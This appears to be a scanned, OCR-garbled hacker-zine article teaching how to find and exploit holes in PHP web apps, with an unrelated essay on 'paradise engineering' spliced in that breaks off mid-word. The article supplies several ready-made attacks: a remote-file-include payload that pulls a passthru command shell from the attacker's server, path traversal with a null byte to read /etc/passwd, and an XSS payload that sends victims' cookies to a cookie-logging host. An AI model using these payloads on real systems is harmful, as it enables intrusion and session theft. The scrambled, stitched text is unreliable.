ir tht -vtiywJ-jrd ge-lv^rs include, require, or fopen If input is passed to include, require, or fopen in ways similar to: include "$page" or require "$page"; ... then depending on the server configuration, you could either read files off their machine or even execute your own PHP code. By setting $page to something like Vetc/passwd' or "../../admin/.htac- cess", you could read sensitive data off of their machine like server config files or passwd files. In many systems if you pass a URL to include() their server will make an http connection grab the file and execute php code. This means you can write a script like<?php echo passthru ( $cmd) ; ?>,saveit on your webserver, and call their script like include. php?file=http://www.yourdomain.com/passthru. php&cmd=cat /etc/passwd . Depending on how they modify their statement (like include "includes/$page", include "$page.php", etc) it may limit what you can do or make it a bit more difficult. Often times error statements will reveal the path of the script as well as what input they are passing to include. Warning: Unable to access fun in /home/ sites/18/web/cia/include .php on line 1 If a script ends your input with an extension(like include "/path/to/$file.inc"), you may be forced to reading files only ending with a .inc - unless they are running specific combinations of php and their os which may allow you to add a %00 at the end of your input which will cause include to ignore the extension, ex: include.php?file=../../../../../etc/ passwd%00. cross site scripting When a script takes input and sends it back to the- browser without sufficient validation, you could inject javascript code that lets you interact with the user's browser. <?php echo "Hello, $name"; ?> showname.php?name=freeme<script>alert(docume nt.cookie);</script> This would make an alert box displaying the cook- ies for the given domain to the user. If this is vulner- able, it's also very likely that you could craft a URL that redirects the user to an offsite URL that logs the user's cookie for later retreival through some- thing like... showname . php? name=freeme< scrip t>windo w . navigate ( "http : / /www . somehost .com/ cookiesteal. php? thegoods="+document . cookie) </ script> ...where cookiesteal.php would log all incoming requests and the contents of 'thegoods'. Many web scripts use cookies to store authentication informa- tion, which you could use on the original site either by saving the values of these cookies as your own, cracking passwords, etc. You can spend all your time making sure all your services are patched, in- stall expensive firewalls and tripwire software, and make sure all your com- munication is done over SSL. But even the more complex and secure server can all go to waste if you are using insecure PHP code. More and more people are realizing the weight of web application security holes. Instead of talking about specific exploits that come and go, I will try to explain some techniques that will help to find vulnerabilities in PHP software and how to exploit them to gain access. Often most vulnerabilities are not in the actual server software but in poorly written code or irresponsible configuration. Most of the time it comes down to not validating input before it is passed to vital system functions. At the worst, this will allow you to execute commands from the same user that the web server is running at (usually www, apache, or nobody) which usually has a relatively low level of permissions on the server. It's not much, but the access can be exploited further to possibly gaining more permissions on the machine, reading sensitive information, or depending on how poorly the server is configured(folders and files chmodded to 666, passwords and configuration files lying around, etc), it could be devestating indeed. $The Fundamentals; If variables are passed from your client to their server, you can change these values to anything you'd like. This is one of the most fundamental prin- ciples behind web security. If you see a link like 'index.php?section=links', their script examines the variable 'section' and responds accordingly. While there may not be a way to modify the value of this variable on their site itself, you could do so through a number of ways. There are three ways variables can be passed from your browser to the PHP script: over GET, POST, or cookies. Variables being sent over the address bar (like asdf.php?varl=somevalue&var2=anothervalue) is known as the GET method and can be changed directly in the URL bar. Variables sent from a form are sent over POST, and can be changed either by creating your own HTML page with a form of your own, or by forging your own HTTP request using the HTTP protocol(this can be done using telnet on port 80 - see rfc2616 for specific commands). Cookies are saved and sent in a num- ber of different ways varying on your operating system and web browser. If you can't find a way to change the values of your cookies through a GUI interface, you can change the values through forging your own HTTP request as well. Many times you can use any of the above methods to set a variable in- side of a script. But more and more php configurations have register_glo- bals off. If this is the case, PHP scripts have to refer to variables like $_ GET['varname'], $_POST and $_COOKIE. This restricts you into setting variables using the method they were intended to be used with. This does not make it invincible, but it forces you to spoof the variable in the way that the script is expecting the input. SGenerating Errors; Once you find out how to inject different values into variables of a web application, you should try to generate an error code. This can be done by inserting all sorts of (not so) random characters into these scripts. Very often scripts will dump all sorts of messages that could help you find out their database structure, file paths, and more. If you found a script similar to index.php?file=links.php, and tried changing it to index.php?file=linksaaaa.php, it might give you an error similar to: Paradise Engineering, Political Change by archaios Utopianism, rooted in the primal desire for abrogation of mor- tality, is the foundation of the modern hedonistic imperative. Alluding to an unseen order, archetypal modern religion dis- avows such a notion, a philosophy closely aligned with 19th century, morally absolutist cautionaries. The egregious nature of such a crucial error is self-explanatory, scientific dogma proselytizing the ability to absolve man of His painful iniquities through what may be termed 'paradise engineering', a much- maligned concept as a direct result of such insidious works as Orwell's 1984 and Huxley's Brave New World. The failure of communism in the Soviet Union relinquishes all doubt that, without a concerted effort by the proletariat to debase the plu- tocratic capitalist oligarchy (ubiquitous in Western nations), Utopianism is bereft of rationale and the prevalation of archaic Judeo-Christian ideals is inevitable. The decidedly utilitar- ian basis of the consumerist society presented in Brave New World eviscerates the possibility of egalitarianism in its purest form, social order - the presupposed need of which delineates historical analogues - rooted in shades of apathetic totalitari- anism. Impugning upon users of psychoactive substances the sin of 'defiling God's temple', contemporary morality insinu- ates that although the next-generation of euphori- and empa- thogenic drugs are within reach, such indulgence is contrary to the notional social hierarchy and transcends the suffering that provides a theoretical basis for Christ's salvati